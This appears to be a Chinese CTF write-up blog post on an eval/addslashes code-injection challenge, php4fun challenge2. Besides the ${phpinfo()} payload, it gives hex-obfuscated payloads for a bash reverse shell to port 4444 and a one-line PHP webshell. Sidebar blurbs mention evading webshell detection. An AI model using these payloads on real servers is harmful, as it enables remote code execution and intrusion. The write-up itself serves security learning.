dd.fun.php,[php4fun](challenge2)将只能执行phpinfo的漏洞转换为一句话木马

最新推荐文章于 2022-04-10 19:46:13 发布
最新推荐文章于 2022-04-10 19:46:13 发布
阅读量395 收藏
点赞数
文章标签: dd.fun.php

源码 :

$str=@(string)$_GET['str'];

eval('$str="'.addslashes($str).'";');

最开始百思不得其解 , 然后查阅了一些大佬们的 WriteUp

得到如下的 payload :

?str=${phpinfo()}

相关 php 官方文档可以参考 :

但是仍旧不太明白为什么这样就可以执行代码...

希望有知道的大佬可以教教我

本文的重点来了

笔者在根据网上大佬们提供的 Payload 的复现的时候发现

(原版的题目服务器已经挂掉了 , 所以笔者也不知道这个题最终的目标是啥...)

这个题目好像就是只让你执行一下 phpinfo 就行了

那么可不可以再猥琐一点执行一点别的呢

尝试一下直接这样行不行 :

?str={eval($_GET[c])}&c=phpinfo();

// 似乎并不行...

经过一番尝试 , 笔者最终发现了下面两种 Payload

// 一个反弹 shell 的 Payload

?str=${system(hex2bin(ff0a2f62696e2f62617368202d6320277368202d69203e26202f6465762f7463702f3132372e302e302e312f3434343420303e263127))}

// 一个一句话木马的 Payload

?str=${eval(substr(hex2bin(ff6576616c28245f524551554553545b635d293b),1,19))}&c=phpinfo();

dd72566ca4df

image.png

小兔usako
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php4fun
wusuopuBUPT的专栏
01-23 2295
php4fun : http://php4fun.sinaapp.com/ 攻略:http://drops.wooyun.org/papers/660
云演CTF——php4fun
weixin_56301399的博客
01-16 3657
云演CTF: 010.php4fun
wanguixiu的博客
06-10 919
云演CTF: 010.php4fun 作者: admin 时间: 2021-05-31 分类: 云演CTF 题目给出源码备份"index.bak":<?php function filter($v){ echo $v; $w = array('<','>','\.\.','^/+.*','file:///','php...
php4fun第一题,2018网鼎杯第四场Web题解
weixin_42432918的博客
03-21 297
Webcomment题目界面如下,有发帖留言的功能,不过需要登录才能使用。可以通过爆破得知账号密码为:zhangwei/zhangwei666手工测试发现存在 .git 泄露,用 GitHack 下载泄露文件,发现 write_do.php 的代码不全。通过 git cat-file -p xxxxx 命令显示版本库对象的内容、类型及大小信息,可以看到完整的代码:具体代码如下:可以看到上面 第13...
phpfun($param)和fun(&$param)的区别
black521devil的专栏
12-23 699
首先你要明白指针的概念,不过php的指针和c的指针有一些不同 $a = $b; 是把$b的值赋值给$a,如果赋值后,$b的值改变了,$a的值是不会改变的 $a =&$b; 这个是把$b的地址传递给$a,这个时候,$a和$b都指向内存中的同一块地址,所以如果赋值后,你改变了$b的值,$a的值也是会改变的 举个例子 $b = 1; $a = $b; $b = 2; e
windows php7.4 php-apcu.dll
09-11
标题中的"windows php7.4 php-apcu.dll"和描述中的"windows php7 apcu php_apcu.dll"都提到了Windows环境下PHP 7.4版本与APCu扩展的关联,特别是`php_apcu.dll`这个动态链接库文件。APCu(Alternative PHP Cache for...
php-5.3.28.tar.gz
01-10
PHPPHP:Hypertext Preprocessor)是一种广泛使用的开源脚本语言,主要应用于Web开发,可以嵌入到HTML中执行。在本例中,我们关注的是PHP的5.3.28版本,它是一个tar.gz格式的压缩包,通常用于Linux环境。这种压缩...
多语言微交易多行情盘PHP平台源码扩展redis phpinfo.zip
最新发布
01-10
环境ngingx mysql5.6 php7.0扩展redis phpinfo 已修复多出 远程攻击漏洞 上传搭建 导入数据库 然后 application/config.php 配置数据库 coller.html 挂波动行 后台lord默认账号admin密码123456
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息
09-30
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息,查看zend的目录是否有user权限。默认即可。
php使用Image Magick将PDF文件转换为JPG文件的方法
10-24
// 执行ImageMagick的'convert'命令,将PDF转换为JPG,并应用设置 exec('convert "'.$pdf_file.'" -colorspace RGB -resize 800 "'.$save_to.'"', $output, $return_var); if ($return_var == 0) { // 如果执行...
land of lisp
01-27
《land of lisp》,英文版(目前无英译)。pdf文档,清晰,超赞的lisp书籍。学习后,建议买实体书进行收藏。 内容缩略: BRIEF CONTENTS Acknowledgments........................................................................................................xvii Introduction....................................................................................................................1 SECTION I: LISP IS POWER Chapter 1: Getting Started with Lisp................................................................................15 Chapter 2: Creating Your First Lisp Program.....................................................................21 Chapter 3: Exploring the Syntax of Lisp Code...................................................................31 SECTION II: LISP IS SYMMETRY Chapter 4: Making Decisions with Conditions..................................................................49 Chapter 5: Building a Text Game Engine.........................................................................67 Chapter 6: Interacting with the World: Reading and Printing in Lisp....................................85 Chapter 6.5: lambda: A Function So Important It Deserves Its Own Chapter.......................103 Chapter 7: Going Beyond Basic Lists.............................................................................107 Chapter 8: This Ain!ˉt Your Daddy!ˉs Wumpus..................................................................1 Chapter 9: Advanced Datatypes and Generic Programming............................................153 SECTION III: LISP IS HACKING..................................................................................191 Chapter 10: Looping with the loop Command................................................................195 Chapter 11: Printing Text with the format Function...........................................................221 Chapter 12: Working with Streams...............................................................................237 Chapter 13: Let!ˉs Create a Web Server!........................................................................25 Functional Programming Is Beautiful ..............................................................................269 SECTION IV: LISP IS SCIENCE Chapter 14: Ramping Lisp Up a Notch with Functional Programming................................291 Chapter 15: Dice of Doom, a Game Written in the Functional Style..................................303 Chapter 16: The Magic of Lisp Macros..........................................................................339 Chapter 17: Domain-Specific Languages........................................................................355 Chapter 18: Lazy Programming....................................................................................375 Chapter 19: Creating a Graphical, Web-Based Version of Dice of Doom..........................401 Chapter 20: Making Dice of Doom More Fun.................................................................417 Epilogue....................................................................................................................429 Index.........................................................................................................................465
HITCTF2018-web全题解
蚁景网安学院
02-07 2802
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
使用复杂变量绕过addslashes函数实现RCE
silence1_的博客
11-01 1690
使用复杂变量绕过addslashes函数实现RCE addslashes ( string $str ) : string 使用反斜线引用字符串 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(’)、双引号(")、反斜线(\)与 NUL(NULL 字符)。 简单的说,就是在传入的字符串的单引号,双引号,反斜线和空字符前加反斜线转义 先看看题目代码: &...
PHP ctf addslashes,[红日安全]代码审计Day13 - 特定场合下addslashes函数的绕过
weixin_33631836的博客
03-17 685
本文由红日安全成员: l1nk3r 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并...
[网络安全学习篇58]:PHP代码注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-05 2474
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我...
HITCTF 2018 wp [我真是菜鸟]
Assassin
02-02 5760
WEB PHPreading 源码泄露,存在index.php.bak,,解一下base64知道 $flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm'); 输入得到flag BabyEval 看一下泄露了一部分源码 <!-- $str=@(str
php stripslashes() addslashes() 解析
weixin_33698823的博客
05-13 73
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。 实例: &lt;?php $str = "Is your name O\'reilly?"; // Outputs: Is your name O'reilly? echo stripslashes($str); ?&gt;   输出: Who's John Adams? ...
CTF初识与深入
hl1293348082的专栏
04-10 517
这段时间一直在忙活CTF相关的东西,从参赛者到出题人,刷过一些题,也初步了解了出题人的逻辑;这篇文章就简单地讲一下CTF如何入门以及如何深入的学习、利用CTF这个训练、学习平台。 文章里会涉及的一些资源:http://pan.baidu.com/s/1jIDpV8q CTF认知 CTF可以理解成一种锻炼和学习信息安全技术的训练场,具体的解释在百度以及这篇安全维基~上都有,就不再赘述了。而CTF对信安人员的意义,在我看来,是扩宽我们的安全知识面,以及实战式应用我们学到的安全知识。随着《网络安全法》的公布
php一句话木马免杀
08-03
引用[1]中提到了一个关于PHP一句话木马的实验,该木马成功骗过了阿里云的检测。木马的代码被放置在服务器的php文件夹下的miansha.php文件中。该木马使用了一些技巧来绕过检测,比如设置了执行时间限制和忽略用户中止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值